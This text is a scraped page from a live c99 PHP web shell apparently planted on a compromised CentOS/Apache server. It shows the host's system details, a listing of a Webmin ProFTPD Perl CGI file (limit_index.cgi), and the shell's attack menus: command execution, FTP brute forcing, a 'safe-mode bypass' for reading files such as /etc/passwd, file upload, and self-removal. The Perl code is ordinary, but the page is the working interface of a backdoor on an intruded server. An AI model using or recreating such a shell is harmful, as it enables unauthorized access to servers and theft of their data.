!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/proftpd/   drwxr-xr-x
Free 53.79 GB of 127.8 GB (42.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     limit_index.cgi (2.9 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# limit_index.cgi
# Display a menu of icons for per-command options

require './proftpd-lib.pl';
&ReadParse();
if ($in{'file'}) {
    $conf = &get_ftpaccess_config($in{'file'});
    }
else {
    if ($in{'global'}) {
        $conf = &get_config();
        $conf = &get_or_create_global($conf);
        }
    else {
        ($conf, $v) = &get_virtual_config($in{'virt'});
        }
    if ($in{'anon'}) {
        $anon = &find_directive_struct("Anonymous", $conf);
        $conf = $anon->{'members'};
        }
    if ($in{'idx'} ne '') {
        $dir = $conf->[$in{'idx'}];
        $conf = $dir->{'members'};
        }
    }
$l = $conf->[$in{'limit'}];
$ln = $l->{'value'};
$desc = $in{'file'} ? &text('limit_header6', $ln, &html_escape($in{'file'})) :
    $dir ? &text('limit_header4', $ln, $dir->{'words'}->[0]) :
    $in{'global'} ? &text('limit_header7', $ln) :
    $in{'anon'} ? &text('limit_header5', $ln) :
    $in{'virt'} ?  &text('limit_header1', $ln, $v->{'words'}->[0]) :
    &text('limit_header2', $ln);
&ui_print_header($desc, $text{'limit_title'}, "",
    undef, undef, undef, undef, &restart_button());

$limit_icon = { "icon" => "images/limit.gif",
            "name" => $text{'limit_limit'},
            "link" => "edit_lserv.cgi?virt=$in{'virt'}&idx=$in{'idx'}&limit=$in{'limit'}&anon=$in{'anon'}&global=$in{'global'}&file=$in{'file'}" };
$ed_icon = { "icon" => "images/edit.gif",
         "name" => $text{'limit_edit'},
         "link" => $in{'file'} ? "manual_form.cgi?limit=$in{'limit'}&file=$in{'file'}" : "manual_form.cgi?virt=$in{'virt'}&idx=$in{'idx'}&limit=$in{'limit'}&anon=$in{'anon'}&global=$in{'global'}" };
&config_icons("limit", "edit_limit.cgi?virt=$in{'virt'}&idx=$in{'idx'}&limit=$in{'limit'}&anon=$in{'anon'}&file=$in{'file'}&global=$in{'global'}&", $limit_icon, $ed_icon);

if ($in{'file'}) {
    &ui_print_footer("ftpaccess_index.cgi?file=$in{'file'}",$text{'ftpindex_return'},
        "ftpaccess.cgi", $text{'ftpaccess_return'},
        "", $text{'index_return'});
    }
elsif ($in{'idx'} eq '') {
    if ($in{'global'}) {
        &ui_print_footer("", $text{'index_return'});
        }
    elsif ($in{'anon'}) {
        &ui_print_footer("anon_index.cgi?virt=$in{'virt'}",$text{'anon_return'},
            "virt_index.cgi?virt=$in{'virt'}",$text{'virt_return'},
            "", $text{'index_return'});
        }
    else {
        &ui_print_footer("virt_index.cgi?virt=$in{'virt'}",$text{'virt_return'},
            "", $text{'index_return'});
        }
    }
else {
    if ($in{'global'}) {

        &ui_print_footer("dir_index.cgi?virt=$in{'virt'}&idx=$in{'idx'}&global=$in{'global'}", $text{'dir_return'},
            "", $text{'index_return'});
        }
    elsif ($in{'anon'}) {
        &ui_print_footer("dir_index.cgi?virt=$in{'virt'}&idx=$in{'idx'}&anon=$in{'anon'}", $text{'dir_return'},
            "anon_index.cgi?virt=$in{'virt'}",$text{'anon_return'},
            "virt_index.cgi?virt=$in{'virt'}",$text{'virt_return'},
            "", $text{'index_return'});
        }
    else {
        &ui_print_footer("dir_index.cgi?virt=$in{'virt'}&idx=$in{'idx'}&anon=$in{'anon'}", $text{'dir_return'},
            "virt_index.cgi?virt=$in{'virt'}",$text{'virt_return'},
            "", $text{'index_return'});
        }
    }


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0155 ]--